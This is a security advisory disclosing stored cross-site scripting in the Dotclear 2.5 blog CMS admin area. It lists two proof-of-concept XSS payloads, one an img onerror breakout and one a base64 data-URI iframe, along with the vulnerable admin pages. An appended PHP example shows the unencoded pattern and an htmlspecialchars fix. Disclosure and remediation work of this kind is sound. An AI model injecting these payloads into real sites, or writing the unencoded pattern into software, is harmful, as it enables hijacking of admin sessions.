Dotclear 2.5 Cross Site Scripting

2013-06-04T00:00:00
ID PACKETSTORM:121882
Type packetstorm
Reporter Nikhalesh Singh Bhadoria
Modified 2013-06-04T00:00:00

Description

                                        
`Exploit Title: Dotclear 2.5 CMS Cross Site Scripting Vulnerabilities  
# Date: 06/04/2013  
# Author: Nikhalesh Singh Bhadoria  
# Twitter: @nikhaleshsingh  
# Download Link: http://dotclear.org/  
# Versions Affected: Dotclear 2.5.  
# Category: XSS  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
Vulnerability Description:  
  
Input in the admin area user options, and in many other places, is not sanitized. This results  
in stored cross-site scripting.  
  
Dotclear Description:  
DotClear was designed only for weblog management, and does it well. It is completely free! DotClear is free software distributed under the GNU General Public License.  
  
POC:  
http://www.youtube.com/watch?v=3eiEC8MtrpM&feature=youtu.be  
  
Code :-  
########################################################################################################  
"><img src=x onerror=prompt(0);>  
  
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">  
  
http://demo.xxx.com/admin/preferences.php  
http://demo.xxx.com/dotclear/admin/users.php  
  
##########################################################################################################  
Fix:  
Better sanitization by restricting special characters.  
  
Regards,  
Nikhalesh Singh Bhadoria  
Information Security Enthusiast  
Website: Gurunsb.com  
`
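
The stored-XSS pattern described above and one way to close it, shown as an added example that is not part of the advisory and not Dotclear's own code. It swaps the "restricting special characters" wording of the Fix line for context-aware output encoding with PHP's `htmlspecialchars`; the function names and the `user_displayname` field are hypothetical.

```php
<?php
// Added example, not Dotclear code. Function and field names are hypothetical.

// Constructed sample: a stored profile value holding the first payload
// listed in the advisory.
$stored = '"><img src=x onerror=prompt(0);>';

// Vulnerable pattern: the stored value is concatenated into an attribute
// without encoding, so the leading quote closes value="..." and the rest
// is parsed as new markup every time an admin views the page.
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Encode for HTML text and quoted-attribute contexts at output time.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of returning an empty string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: every dynamic piece is encoded where it is written out.
function render_field_safe(string $name, string $value): string
{
    return '<input type="text" name="' . h($name) . '" value="' . h($value) . '">';
}

// True when no character that can end the attribute or open a tag survives.
function is_inert_in_attribute(string $encoded): bool
{
    return strpbrk($encoded, '<>"\'') === false;
}

echo render_field_unsafe('user_displayname', $stored), PHP_EOL;
echo render_field_safe('user_displayname', $stored), PHP_EOL;

// The raw value would break out of the attribute; the encoded one cannot.
var_dump(is_inert_in_attribute($stored));
var_dump(is_inert_in_attribute(h($stored)));

// Encoding is lossless: the original text is still what the user sees and edits.
var_dump(html_entity_decode(h($stored), ENT_QUOTES, 'UTF-8') === $stored);
```

Encoding at output leaves the stored data untouched, so the same value can be encoded differently if it is later written into a URL or a script context.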